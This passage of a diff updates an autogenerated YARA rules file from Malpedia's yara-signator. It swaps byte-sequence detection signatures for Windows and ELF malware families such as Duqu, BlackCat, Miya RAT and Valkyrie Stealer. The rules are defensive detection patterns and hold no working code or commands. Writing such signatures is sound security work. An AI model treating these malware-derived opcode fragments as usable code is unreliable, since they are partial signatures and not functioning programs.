-		$sequence_17 = { 6a01 51 8b413c 8b440828 03c1 }
-		$sequence_18 = { 83c410 83f801 750e 57 ff15???????? 8bd8 }
-		$sequence_19 = { f9 a6 c3 4b fd 008d4556f400 08640f08 }
-		$sequence_20 = { 40 8945d0 8b45c0 83c008 8945c0 8b45b8 }
-		$sequence_21 = { 8b45a0 05c8d45566 7440 c745880a000000 eb07 8b4588 }
-		$sequence_22 = { 55 08709e 891f 3e50 }
-		$sequence_23 = { 2345e4 8945d8 c645f300 c645fc65 }
-		$sequence_24 = { a1???????? 8945b4 a1???????? 83c044 a3???????? }
-		$sequence_25 = { 8b45b4 83e803 8945b4 eb22 }
-		$sequence_26 = { 0305???????? a3???????? a1???????? 0faf45bc a3???????? ebc5 8365d400 }
+		$sequence_0 = { ff15???????? 48837c246800 7504 33c0 eb19 488b542450 488b4c2468 }
+		$sequence_1 = { 488b442430 8b4c2438 89480c 488b442430 4881c4e8000000 c3 }
+		$sequence_2 = { 488d152b530000 488b4c2440 ff15???????? 4889442420 }
+		$sequence_3 = { 8a442470 88442440 48c744243800000000 488d0595c8ffff 4889442430 488d0555d9ffff 4889442428 }
+		$sequence_4 = { 448bc8 4c8b442420 488b15???????? 488d4c2460 }
+		$sequence_5 = { 48894c2408 4883ec78 ff15???????? 41b800010000 }
+		$sequence_6 = { 85c0 742c 0fb6442421 8b4c2424 83c105 8bc9 488b942440010000 }
+		$sequence_7 = { 488d0dad360000 e8???????? 41b840000000 ba00300000 b908000000 }
+		$sequence_8 = { 837c245c00 7407 837c244000 7502 eb33 8b442440 }
+		$sequence_9 = { 488bc1 4889842498000000 488b942498000000 488b8c24c8000000 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 107520
 }
-rule MALPEDIA_Win_Aurora_Auto : FILE
+rule MALPEDIA_Win_Duqu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cb6e66dc-0b30-52d7-abd2-183f4137b9af"
+		id = "d021a3e0-a963-5c5a-8894-2a3900c75d82"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aurora_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.duqu_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "736e5133ae609420c62fd5eab55e12d52695b2d2a929e74285f1e9a94056c135"
+		logic_hash = "a5f03c1a39b5d865f59b6af67604227aa6b29a16f7ea254ca225f6a37485518b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88004,32 +88035,38 @@ rule MALPEDIA_Win_Aurora_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 8d4dc0 e8???????? 68???????? c645fc01 e8???????? }
-		$sequence_1 = { 6a1f 68???????? c745d40f000000 c745d000000000 c645c000 e8???????? c645fc01 }
-		$sequence_2 = { 0f8259ffffff 8d4de4 e8???????? 8bc6 8b4df4 64890d00000000 59 }
-		$sequence_3 = { 75f9 2bca 51 53 8d4dd0 e8???????? }
-		$sequence_4 = { 0f45c2 50 e8???????? 8bfb }
-		$sequence_5 = { 68???????? 8d8de4f1ffff c785f8f1ffff0f000000 c785f4f1ffff00000000 c685e4f1ffff00 e8???????? }
-		$sequence_6 = { c785b8efffff0f000000 c785b4efffff00000000 c685a4efffff00 e8???????? 8d8dbcefffff }
-		$sequence_7 = { 0f8483000000 c1e706 03f8 83c106 894ddc 7869 8bc7 }
-		$sequence_8 = { 68???????? 8d8d24f1ffff c78538f1ffff0f000000 c78534f1ffff00000000 }
-		$sequence_9 = { a1???????? 33c5 50 8d45f4 64a300000000 c745ec00000000 83ec18 }
+		$sequence_0 = { e8???????? 8d8df8fdffff 51 ff9088000000 8bd6 8bc8 }
+		$sequence_1 = { 5e 5b 8be5 5d c3 8b4718 ebf4 }
+		$sequence_2 = { ba78978b33 89869c000000 8bcb e8???????? ba5859004e }
+		$sequence_3 = { 744d 8b4c2414 8a442413 8b5c2418 85c9 7e30 0fb6c8 }
+		$sequence_4 = { 85c0 7465 e8???????? 85c0 }
+		$sequence_5 = { 56 51 8bf2 e8???????? }
+		$sequence_6 = { 8b5c242c 741a 40 83c704 8944241c 3b4218 }
+		$sequence_7 = { baec8ce154 8bcb e8???????? ba8eacac75 894628 }
+		$sequence_8 = { ba1225339c 89462c 8bcb e8???????? 89466c 85c0 }
+		$sequence_9 = { 8b4c2414 40 49 89442420 }
+		$sequence_10 = { 8bec 81ec0c020000 56 ff7508 8bf2 }
+		$sequence_11 = { 8bec 81ec04020000 53 8b5d08 56 57 6af0 }
+		$sequence_12 = { 8bec 81ec10080000 8365fc00 b800010000 }
+		$sequence_13 = { 8bec 53 56 8bd8 8d732c 57 8bce }
+		$sequence_14 = { 8bec 56 57 8b7d08 33f6 3b7d0c }
+		$sequence_15 = { 8bec 81ec0c020000 8365fc00 833d????????ff }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 18759680
 }
-rule MALPEDIA_Win_Fudmodule_Auto : FILE
+rule MALPEDIA_Win_Miya_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e6e3f32-6e1c-5a24-9698-45bfa215e2d1"
+		id = "b014bac2-07d1-5fef-bdcc-2e598306fac3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fudmodule_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miya_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miya_rat_auto.yar#L1-L191"
 		license_url = "N/A"
-		logic_hash = "4035950c3484d09b89067be960d8e0c73dab8587b168d82e14a4974f9d87cb3f"
+		logic_hash = "98cc52272c83937733d9eba2aa0b9bb5ed8cab147dbc386514a5033d544b9bd7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88043,40 +88080,40 @@ rule MALPEDIA_Win_Fudmodule_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 660fb3e9 53 f6dd 660fbbe2 57 }
-		$sequence_1 = { 4801e3 fec8 66c1cf03 d2e8 }
-		$sequence_2 = { 498b8c24e0090000 e8???????? 4983bc24d809000000 488bb42480000000 488b5c2478 }
-		$sequence_3 = { f9 4801e3 e9???????? 660fbec2 58 e9???????? f5 }
-		$sequence_4 = { 41ffd5 85c0 782d 488bd6 }
-		$sequence_5 = { 30db 80db4a 00eb 83c101 fec3 }
-		$sequence_6 = { e8???????? 498bcc e8???????? 8d7514 }
-		$sequence_7 = { 4963c3 488d4c2458 8b540460 4c8d440460 }
-		$sequence_8 = { 0fb6c3 f6d0 0f9cc0 58 e9???????? }
-		$sequence_9 = { 488bce e8???????? 85c0 7403 83cf08 488bce }
-		$sequence_10 = { 488d3c01 ff15???????? 488d55b0 488bc8 488d442440 }
-		$sequence_11 = { 4883c420 b37a e9???????? 0f855b73ffff 66d3fe }
-		$sequence_12 = { 488d8c246ed9e517 f5 f8 4889c3 488d3ced1b6cb3bd }
-		$sequence_13 = { 4889542420 4c8d442430 41b908000000 488bd3 488bc8 }
-		$sequence_14 = { c745b073734e6f c745b474696679 c745b8526f7574 c745bc696e6545 66c745c07800 }
-		$sequence_15 = { fecb 4889e8 b377 b301 660fa3d2 0fbae207 }
+		$sequence_0 = { 0f84fa0f0000 83ec08 0fae5c2404 8b442404 25807f0000 3d801f0000 750f }
+		$sequence_1 = { 0fbf45fc c9 c3 8bff 55 8bec 83ec18 }
+		$sequence_2 = { 68a00f0000 ff15???????? 6a00 6a00 6a00 6a06 6a01 }
+		$sequence_3 = { 7541 d9ec d9c9 d9f1 833d????????00 0f854c0d0000 }
+		$sequence_4 = { 5d e9???????? 8bff 55 8bec b8ffff0000 83ec14 }
+		$sequence_5 = { 8bc6 5e 5d c20400 e8???????? cc 56 }
+		$sequence_6 = { 8d642408 0f85c90f0000 eb00 f30f7e442404 660f2815???????? 660f28c8 660f28f8 }
+		$sequence_7 = { 75be ddd8 db2d???????? b802000000 833d????????00 0f85e00c0000 }
+		$sequence_8 = { 4889742418 57 4883ec20 488d05da910700 33f6 488901 488b4108 }
+		$sequence_9 = { e9???????? 488d8a48000000 e9???????? 488d8a40010000 e9???????? 488d8ab0010000 e9???????? }
+		$sequence_10 = { 4c8bc7 89742428 33d2 b9e9fd0000 4889442420 ff15???????? 0f10442450 }
+		$sequence_11 = { 4533c0 488bd6 488d4dc7 e8???????? 488b7ddf 4533e4 eb67 }
+		$sequence_12 = { 0f57c9 f30f7f4d40 488d4d40 e8???????? 488d4d40 e8???????? }
+		$sequence_13 = { 0f1145c7 4c8965d7 48897ddf 66448965c7 488d7160 48897597 44386168 }
+		$sequence_14 = { 0f57c0 488d5308 48890b 488d4808 0f1102 e8???????? 488d0588aa0600 }
+		$sequence_15 = { 90 44897608 488d0554590500 488906 488937 488d4dd7 e8???????? }
 
 	condition:
-		7 of them and filesize < 795648
+		7 of them and filesize < 1238016
 }
-rule MALPEDIA_Elf_Blackcat_Auto : FILE
+rule MALPEDIA_Win_Dented_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "73330468-751f-50b4-b552-0b9e2c8419d0"
+		id = "ec077e48-e364-5ad2-b3eb-708d9cb96474"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.blackcat_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dented_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "ed5b892df40ee57ffa43026084cc0b81998de922d2939024f186c2c4f53be22e"
-		score = 60
-		quality = 45
+		logic_hash = "8a83542dc4cfbb6071fb1f2a2748ff19dad273e746a7625af72e8307d011702d"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88088,32 +88125,32 @@ rule MALPEDIA_Elf_Blackcat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7227 b803000000 81fa???????? 721a }
-		$sequence_1 = { b903000000 81fa???????? 721a b904000000 81fa???????? 720d }
-		$sequence_2 = { 08d9 80f901 750e 84c0 }
-		$sequence_3 = { 83f801 0f95c0 20c8 0fb6e8 }
-		$sequence_4 = { 721a b904000000 81fa???????? 720d }
-		$sequence_5 = { e8???????? 0f0b 90 90 90 55 53 }
-		$sequence_6 = { e8???????? 0f0b 90 90 90 90 53 }
-		$sequence_7 = { 5d c3 e8???????? 0f0b 90 90 90 }
-		$sequence_8 = { 762a 0fb6c8 8d1489 8d0cd1 c1e90c 6bd164 }
-		$sequence_9 = { 7227 b803000000 81fa???????? 721a b804000000 81fa???????? }
+		$sequence_0 = { 68???????? bf08020000 8d85ecfbffff 57 }
+		$sequence_1 = { c1e814 8b4dfc 5f 33cd }
+		$sequence_2 = { 8d55ff a1???????? 52 885dff 8d4810 }
+		$sequence_3 = { 8b35???????? 8d85f8feffff 50 8d85f4fdffff 50 ffd6 }
+		$sequence_4 = { 6a01 53 68???????? ffb5e8fbffff ff15???????? }
+		$sequence_5 = { e8???????? 8364242c00 8d4c2434 807d1c00 c74424300f000000 c644241c00 }
+		$sequence_6 = { 59 8bf0 8bcf 33c0 89b5e8f7ffff 2185f0f7ffff }
+		$sequence_7 = { 8b85f8f7ffff 8a8485fcfbffff 32c1 880416 8b8decf7ffff 43 42 }
+		$sequence_8 = { c21000 55 8bec 81ec18040000 a1???????? 33c5 8945fc }
+		$sequence_9 = { 5f 57 8d45b8 6a00 50 }
 
 	condition:
-		7 of them and filesize < 8011776
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Unidentified_092_Auto : FILE
+rule MALPEDIA_Win_Valkyrie_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "59b4c790-d726-59b3-ba7e-c5c1b1aad17c"
+		id = "d4598928-8b14-591c-9777-90769a8eecd7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_092_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valkyrie_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.valkyrie_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "94c0cdecf630787615c3fd3071d6bf919aa9412f5889bd4558c045e4fba0dd89"
+		logic_hash = "c5262da30071ead337de0712314a64ba13ec652e925a6c656e4cda19b1fcb853"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88127,34 +88164,34 @@ rule MALPEDIA_Win_Unidentified_092_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8b08 ff511c c745fcffffffff 83ceff 8b7db4 }
-		$sequence_1 = { e8???????? 83bd94f6ffff08 8d8d98f5ffff 8d8580f6ffff 0f438580f6ffff 51 }
-		$sequence_2 = { 57 6a00 ff15???????? 50 ff15???????? 8bc3 8b4df4 }
-		$sequence_3 = { 8d8d14f6ffff e8???????? 8d8d14f6ffff 8ad8 e8???????? 84db 0f84b0000000 }
-		$sequence_4 = { 8b5ddc 03ca 23c7 8bd3 0bf0 c1ca0b 03f1 }
-		$sequence_5 = { 8b470c 89460c 8b4710 894610 c745fc00000000 8d4e14 c706???????? }
-		$sequence_6 = { c1c10a c1ca0d 33d1 895dfc 8b4df4 c1c902 33d1 }
-		$sequence_7 = { 8d8db8fdffff 81e37fffffff e8???????? f6c340 }
-		$sequence_8 = { ffd7 8bf8 897dd4 eb03 8b7dd4 }
-		$sequence_9 = { 51 8bd0 8d8d68fbffff e8???????? 8bf8 83c410 8d045b }
+		$sequence_0 = { 89442430 85c0 0f85ab130000 4a8b4c3500 44396914 7d18 e8???????? }
+		$sequence_1 = { 85c9 741c 498b07 44386067 750f 498b8788000000 488d0c49 }
+		$sequence_2 = { e8???????? 448b4ddc eb2a 8d4101 418907 488d0c49 488b8388000000 }
+		$sequence_3 = { 8bc2 c645b82d c1e81f 03d0 c645bb20 c645be3a 8d0492 }
+		$sequence_4 = { 8bde eb4e 803c3e75 751b 8d4305 413bc6 7359 }
+		$sequence_5 = { e8???????? 8d4701 e9???????? 8bcd 488d15829f0b00 4803ce 41b804000000 }
+		$sequence_6 = { 8b8590000000 ffc8 4898 488d0c40 488d1ccf 0fbe4301 3cfa }
+		$sequence_7 = { 7417 4c8b542448 41f6427002 750b 410fbae61c 0f820c010000 488b85f0000000 }
+		$sequence_8 = { 488bf0 4885c0 0f84cb000000 837d0800 7411 488b4f20 498bd6 }
+		$sequence_9 = { eb25 48c744242002000000 4c8d0d17781100 4533c0 ba02000000 488d8c2498000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 10202112
+		7 of them and filesize < 2895872
 }
-rule MALPEDIA_Win_Oldbait_Auto : FILE
+rule MALPEDIA_Win_Milum_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d100a63-9903-54ef-879e-2f52e4e2c1c3"
+		id = "072a5425-70d6-5cbe-aab8-850ca665ab19"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oldbait_auto.yar#L1-L229"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.milum_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3c4b648b9be2acfeca2a30294d4a7ef92b56cb886b14af5b01f11170901c19b6"
+		logic_hash = "9236edc24d0ffb81128dcba2f9b72495a7a041ad4784e9ea16fcd910b2720b0b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88166,46 +88203,32 @@ rule MALPEDIA_Win_Oldbait_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7409 43 83c104 83fb40 72f3 }
-		$sequence_1 = { 8b86f5b11800 8945cc 8b86fdb11800 8945bc }
-		$sequence_2 = { 05d4db1900 8945f4 ff35???????? ff75fc }
-		$sequence_3 = { 8d4b08 51 50 ff75e4 }
-		$sequence_4 = { 50 57 ff55e8 6800080000 ff750c }
-		$sequence_5 = { 3571281424 42 3bd6 894510 72da 8bc7 5f }
-		$sequence_6 = { 56 56 50 ff75ac }
-		$sequence_7 = { 6a00 6a01 6800000080 ff75f8 ff15???????? }
-		$sequence_8 = { 57 8b7d08 8d70ff 85f6 }
-		$sequence_9 = { 888800b01800 ebda 8b45fc 0531b11800 50 8b45f8 }
-		$sequence_10 = { 47 0504040000 83ff08 72f0 83ff08 0f83a6000000 }
-		$sequence_11 = { 6a40 6800300000 68d4fd1900 6a00 ff15???????? }
-		$sequence_12 = { 50 ff7508 ff55e0 ff7508 8d83fcf7ffff }
-		$sequence_13 = { 0f84d3010000 837d0800 0f84c9010000 837ddc0c 7518 }
-		$sequence_14 = { 7626 8b4510 8bca 83f101 83e107 d3e8 }
-		$sequence_15 = { 55 8bec 8b450c 56 33d2 57 8b7d08 }
-		$sequence_16 = { 8b45f8 301c07 41 47 3b4d10 }
-		$sequence_17 = { 50 8d45c4 50 68???????? ff35???????? ffd6 }
-		$sequence_18 = { ff55d8 8bd8 83fbff 752c 8d45c4 50 }
-		$sequence_19 = { 6a00 ff750c ff75fc ff55f0 }
-		$sequence_20 = { 6a64 50 6a01 6a00 }
-		$sequence_21 = { ffd6 ffd0 53 ff55e4 90 90 90 }
-		$sequence_22 = { 50 ff75e0 e8???????? 90 }
-		$sequence_23 = { 57 8d45ec 57 50 53 }
+		$sequence_0 = { 0f85c1000000 8b7608 385e44 751c c6424401 c6464401 8b5104 }
+		$sequence_1 = { 53 8d9424bc000000 c741140f000000 895910 52 8819 e8???????? }
+		$sequence_2 = { 89a570feffff 6aff 53 8d5508 897114 895910 52 }
+		$sequence_3 = { 8b4214 2b4644 8b5218 8945e4 03c1 3bc2 7605 }
+		$sequence_4 = { 8b5604 52 c645fc06 e8???????? bf10000000 eb1b bf10000000 }
+		$sequence_5 = { 895e18 885e08 8b4df4 64890d00000000 59 5e 5b }
+		$sequence_6 = { 50 ba???????? e8???????? 8b850cfcffff a804 7414 8d4dc8 }
+		$sequence_7 = { 7e16 8b4d08 8b55d8 c741180d000000 89511c 83791800 7509 }
+		$sequence_8 = { c645fc17 50 8d4dc8 e8???????? c645fc03 8d8d04ffffff e8???????? }
+		$sequence_9 = { c745e000000000 c645d000 397e14 7314 8b4610 40 50 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 1076224
 }
-rule MALPEDIA_Win_Poortry_Auto : FILE
+rule MALPEDIA_Win_Retro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1496d84e-656c-5933-9472-ddcca15979df"
+		id = "d637dc20-27e8-52c5-9acd-7f862f01bb0c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poortry_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.retro_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e3df0ea052d8930e4d05b0682bf4eefe707f0b5452f36cf3547bbe2d0167b185"
+		logic_hash = "273926cf1373ebba7c2ee31df8ab1a96a84446d1d934a401daaeed8742274515"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88219,32 +88242,32 @@ rule MALPEDIA_Win_Poortry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80c2d6 f6da 41d2db 80f283 4d63d8 4181e3cc593b0e 41c0c35a }
-		$sequence_1 = { 9c 418f00 450fbbf2 458b11 664585f0 66f7c16046 4181fd7b733a3c }
-		$sequence_2 = { 41d3d3 312c24 66450fabe3 410fbafb10 415b 3ac5 f9 }
-		$sequence_3 = { 0fbfdb 66440fb3fa 418ad6 410fb618 48d3ea 66d3c2 d2fe }
-		$sequence_4 = { 480fbfed f8 44311c24 400f9ec5 5d f8 4d63db }
-		$sequence_5 = { 4d0fb7e7 448ae7 415c 66450fbeea 66410fcd 490fbfed 415d }
-		$sequence_6 = { 0fca 41f6c185 56 311424 f8 5e 4863d2 }
-		$sequence_7 = { 66f7de 5e 4584c3 f9 4c3bc0 4d63d2 4d85eb }
-		$sequence_8 = { 488b11 40f6c6b8 498912 4863d7 411ad2 4881ef04000000 66c1daa9 }
-		$sequence_9 = { f5 55 4080e5d9 4881cda16c1a19 40d2d5 311424 66440fbbfd }
+		$sequence_0 = { f3ab 498bec 4585e4 0f8e59010000 488b442428 f2440f1005???????? 498db5fc070000 }
+		$sequence_1 = { 4c8b442460 ffc0 4883c108 4883c204 4983c320 4981c100240000 4981c220290000 }
+		$sequence_2 = { 488bd9 e8???????? 85c0 7409 8b430c 4883c420 5b }
+		$sequence_3 = { 488b4f18 4533c0 e8???????? 488b4f20 8981a0120000 488b4720 8b88ec120000 }
+		$sequence_4 = { 664585d2 7964 4983c102 ffce 7852 498b942430560000 418b8c2428560000 }
+		$sequence_5 = { f30f5cd9 f30f108814100000 f30f59c4 f30f59dc f30f114018 f30f119818100000 f30f105810 }
+		$sequence_6 = { 418bd5 488bcb 4869ff90140000 4903ff e8???????? 837b2401 750b }
+		$sequence_7 = { 0f14c0 450f14c0 0f5ac0 410f5ac8 f2410f58c2 f20f5ec8 f20f5ad1 }
+		$sequence_8 = { 83c364 83bfa000000000 740b 488bd6 488bcf e8???????? 4533c9 }
+		$sequence_9 = { f30f114f08 f30f104308 0f2f4708 768e ba01000000 eb89 f30f104304 }
 
 	condition:
-		7 of them and filesize < 8078336
+		7 of them and filesize < 1409024
 }
-rule MALPEDIA_Win_Nvisospit_Auto : FILE
+rule MALPEDIA_Win_Lumar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45693521-741e-5d7b-a1e6-3a76e159ad3c"
+		id = "66198547-c312-5005-8756-3c4d434f3dfb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nvisospit_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lumar_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "ff70ccb56c3ba29da1863614e8053ff80e99b0375420038026fb05b34e9ea2b2"
+		logic_hash = "7775336cd5e4593c9fd91e39a7fb1823140e1a9590624def112d1a4339e9c62e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88258,32 +88281,32 @@ rule MALPEDIA_Win_Nvisospit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f807 7ea8 83f80b 8b15???????? 0f8e16010000 85d2 0f8493010000 }
-		$sequence_1 = { 0f8598000000 8b15???????? b9???????? e9???????? 0fb60f 89cb }
-		$sequence_2 = { 3b5dc4 89b700004000 89da 75d8 }
-		$sequence_3 = { 8b00 89442404 c70424???????? e8???????? 8b859cf9ffff 0fb74004 0fb7c0 }
-		$sequence_4 = { 8d7600 8dbc2700000000 b9???????? 85d2 0f85eafeffff 8b7104 }
-		$sequence_5 = { 83c308 8b7a04 8b12 039700004000 8d8700004000 89d6 e8???????? }
-		$sequence_6 = { 89742410 894c240c 89542408 89442404 c70424???????? }
-		$sequence_7 = { 8b35???????? 85f6 0f8ef0000000 8b3d???????? }
-		$sequence_8 = { b9???????? e9???????? 0fb60f 89cb 81cb00ffffff }
-		$sequence_9 = { 89c3 89f8 e8???????? 891f ebcc 0fb79900004000 }
+		$sequence_0 = { 7418 8b4514 83c004 894514 8b4514 }
+		$sequence_1 = { 6a68 66898506ffffff 58 6a2f 6689850affffff 58 }
+		$sequence_2 = { 8bd9 03fe e8???????? 3bf8 7604 33c0 }
+		$sequence_3 = { e8???????? 8b7d08 8b5610 8bca 2b4e0c 0fb7df }
+		$sequence_4 = { 58 6bc005 ff5405b4 6a04 58 6bc007 }
+		$sequence_5 = { 668945b0 e8???????? 83c414 fe05???????? 8bce e8???????? 8bcb }
+		$sequence_6 = { 3bc2 753e 8b4510 85c0 74d3 }
+		$sequence_7 = { 0fb74df8 3bc1 7503 ff65e0 ebd9 }
+		$sequence_8 = { 0f2805???????? b900010000 53 56 57 }
+		$sequence_9 = { 8d842414010000 47 50 57 6a00 c7842420010000a8010000 }
 
 	condition:
-		7 of them and filesize < 66560
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Nokki_Auto : FILE
+rule MALPEDIA_Win_Tinytyphon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5dc3d6e8-6868-523c-9edf-f4ac449ab566"
+		id = "ab55cd29-217a-5df2-bee5-a74f289c1c92"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nokki_auto.yar#L1-L149"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinytyphon_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "0fb121b3fe7dee465d08717e2553d7155ecc791f48d5f128590e890ccc5d33a8"
+		logic_hash = "68d6c1790e6e0cef7204bca3122eca023e6ea67ccbabc152f7ca7bf6dee039f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88297,36 +88320,32 @@ rule MALPEDIA_Win_Nokki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 33d2 68ce070000 52 }
-		$sequence_1 = { e8???????? 33c9 68ce070000 51 }
-		$sequence_2 = { a1???????? a3???????? a1???????? c705????????b7634000 }
-		$sequence_3 = { 8b550c 83c41c 6a00 6880000000 }
-		$sequence_4 = { 8945ca 8945ce 668945d2 e8???????? 33c0 8945d6 8945da }
-		$sequence_5 = { c745ec5c374000 894df8 8945fc 64a100000000 8945e8 8d45e8 }
-		$sequence_6 = { 51 52 ff15???????? 85c0 0f85b1010000 8b957ce8ffff }
-		$sequence_7 = { 8d8db4f7ffff 51 68???????? 56 ffd3 }
-		$sequence_8 = { e8???????? 33c0 8d4dac 51 668945ac 8945ae }
-		$sequence_9 = { e8???????? 83c404 8bf0 8d850cf8ffff }
-		$sequence_10 = { 68???????? eb10 6a0b 68???????? eb07 6a0d }
-		$sequence_11 = { 83c40c 6bc930 8975e0 8db1a0e94000 8975e4 eb2b }
-		$sequence_12 = { 888888e84000 40 ebe6 ff35???????? }
-		$sequence_13 = { e8???????? ebde 8bc8 83e01f c1f905 8b0c8d80054100 c1e006 }
+		$sequence_0 = { 51 ff15???????? 8d55ec 52 ff15???????? 8d45ec }
+		$sequence_1 = { 7412 68???????? 8d85e8feffff 50 ff15???????? 8d8dccfdffff 51 }
+		$sequence_2 = { 0bc2 8b4df4 0fb6512b c1e218 0bc2 8b4d08 }
+		$sequence_3 = { 8b55c8 0355c0 8b45d4 0345c0 8a08 880a }
+		$sequence_4 = { 8b550c 8b4208 50 68???????? 8b4d08 51 ff15???????? }
+		$sequence_5 = { 83bd54ffffff00 7517 8b9558ffffff 52 ff15???????? b801000000 e9???????? }
